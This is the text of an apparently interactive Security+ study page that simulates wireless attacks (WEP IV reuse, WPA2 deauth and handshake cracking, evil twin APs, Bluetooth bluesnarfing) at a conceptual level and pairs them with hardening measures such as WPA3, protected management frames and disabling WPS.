WEP (Wired Equivalent Privacy) Simulator

Understand why the 24-bit Initialization Vector (IV) makes WEP highly insecure.

1. Sniffing and Packet Injection

WEP uses the RC4 stream cipher. Because the IV is only 24 bits long, the same IV is reused frequently on busy networks. Attackers inject ARP packets to force the router to send new packets, rapidly collecting duplicate IVs.

Packets Sniffed: 0

IV Collisions Detected: 0

Network Traffic Visualizer

💾

WEP Router

💻

Client

🕵️

Kali Attacker

2. Decryption & Key Recovery

Once enough IVs are collected (generally 20,000 - 50,000 packets for a 64-bit WEP key), the correlation between the key bytes and the IVs allows the secret key to be derived instantly.

Recovered Key: UNRESOLVED

Intercepted Network Data (Decrypted Live)

[SYSTEM] Waiting for key recovery...

WPA2 Deauth & Handshake Dictionary Attack

Simulate sending deauthentication packets to capture the 4-way handshake, then perform a dictionary attack.

1. Send Deauth & Capture Handshake

WPA2 management frames are unencrypted by default. Attackers can forge a "deauth" packet from the router to the client, forcing them off the network. When they reconnect automatically, the attacker sniffs the 4-way handshake.

Handshake Status: Not Captured

Attack Animation

🗼

WPA2 AP

💻

Legit Client

💻

Attacker (Kali)

2. Dictionary Attack on Captured Handshake

The 4-way handshake includes hashes derived from the Wi-Fi passphrase. Since WPA2 relies on a shared secret (WPA2-PSK), attackers run dictionary attacks offline without interacting with the network.

Choose Router Wi-Fi Password:

[SYSTEM] Ready to capture handshake.

Rogue Access Point & Evil Twin Attack

Understand how client devices auto-connect to cloned Wi-Fi access points with stronger signals.

1. Create Cloned AP (Evil Twin)

An Evil Twin is a rogue AP configured with the same SSID (network name) as a legitimate network. Because clients naturally roam and connect to the strongest signal, the attacker can force connection hijacking by boosting transmission power.

Legitimate AP Signal:

-80 dBm (Weak)

Evil Twin AP Signal:

-95 dBm (Off)

Active Signal & Roaming Analysis

🏢

Legit AP (-80 dBm)

💻

Client Laptop

😈

Evil Twin (Off)

2. Captive Portal Credential Harvesting

Once connected to the Evil Twin, the attacker displays a fake captive portal page requesting credentials (e.g. "Firmware Update Required" or "WPA Re-authentication").

Credential Interception Console

[SYSTEM] Waiting for client to connect to Rogue AP...

Bluetooth Vulnerabilities (Bluesnarfing & Bluejacking)

Understand RF discovery threats, unsolicited message spam, and unauthorized data theft.

1. Target Bluetooth Settings

Bluetooth devices are secure when discovery is disabled. If a device is in "Discoverable" mode, attackers within range (approx. 10 meters) can map the device's hardware address (BD_ADDR).

Target Device Discoverable Mode Device broadcasts presence to any nearby scanning radios.

Device list empty. Run scanner.

2. Execute Bluetooth Exploit

Select an exploit to deploy against the discovered target:

🕵️ Attacker

📱 Target Phone

Bluetooth Terminal Logs

[SYSTEM] Terminal initialized. Choose discovery state and scan.

Wi-Fi & RF Security Mitigation Hub

Test your knowledge and configure settings to protect wireless networks from these attacks.

Router & Device Hardening Configuration

Toggle security options on the simulated systems and see how the defense status changes.

Upgrade to WPA3 Uses SAE (Simultaneous Authentication of Equals) to prevent offline dictionary attacks.

Enable Protected Management Frames (PMF) Encrypts management frames like Deauth, preventing client disconnection attacks.

Disable WPS (Wi-Fi Protected Setup) WPS PINs are easily brute-forced. Turning it off secures the gateway.

Deploy WIDS/WIPS & 802.1X Monitors wireless spectrum for rogue AP clones and alerts administrators.

Disable Bluetooth Discoverability Hides Bluetooth device broadcasts, stopping attackers from locating BD_ADDR.

Network Security Shield

🛡️

VULNERABLE

Your network has critical vulnerabilities that allow easy cracking.

❌ Vulnerable to Deauthentication Attacks

❌ Vulnerable to Handshake Offline Decryption

❌ Vulnerable to WPS PIN Brute-force

❌ Vulnerable to Evil Twin Access Points

❌ Target Discoverability Broadcast is Active

Security+ Wireless Key Takeaways

What is the difference between Bluejacking and Bluesnarfing?

Bluejacking is sending unsolicited messages to Bluetooth-enabled devices (annoying but harmless). Bluesnarfing is the unauthorized access of information (contacts, emails, text messages) from a wireless device over a Bluetooth connection.

What is Bluebugging?

Bluebugging goes beyond stealing files (snarfing); it allows an attacker to take complete control of the device, make phone calls, send messages, and listen in on conversations.

How does an Evil Twin attack exploit client roaming?

Client devices save Wi-Fi profiles and automatically reconnect to matching SSIDs. They select the access point with the highest RSSI (received signal strength indicator). Evil twins use high-gain antennas to override legitimate APs.

What is RFID vs. NFC?

RFID (Radio Frequency Identification) covers broad tracking, sometimes over long distances. NFC (Near Field Communication) is a subset of RFID limited to close proximity (under 10cm), commonly used for contactless payments. Both are vulnerable to skimming unless shielded.